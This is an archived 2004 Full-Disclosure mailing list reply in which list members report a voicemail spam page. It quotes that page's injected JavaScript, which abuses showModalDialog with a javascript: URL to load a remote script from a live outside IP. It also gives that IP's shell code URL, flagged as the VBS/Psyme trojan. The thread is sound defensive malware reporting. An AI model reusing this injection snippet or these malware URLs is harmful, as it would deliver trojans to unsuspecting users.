[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!

To: <full-disclosure@xxxxxxxxxxxxxxxx>, <georger@xxxxxxx>
Subject: RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!
From: "Pratik Mehta" <PMehta@xxxxxxx>
Date: Wed, 16 Jun 2004 12:24:54 -0500

The shell code is located at

 http://219.234.95.124/vbox/shellscript.js

and Macafee points it out as:

VBS/Psyme - Trojan

-Pratik

>>> "Geo." <georger@xxxxxxx> 6/16/2004 7:22:48 AM >>>
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

    function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] Akamai
Next by Date: [Full-Disclosure] IBM acpRunner Activex Dangerous Methods Vulnerability
Previous by thread: RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!
Next by thread: [Full-Disclosure] Advisory 10/2004: Chora CVS/SVN Viewer remote vulnerability
Index(es):
- Date
- Thread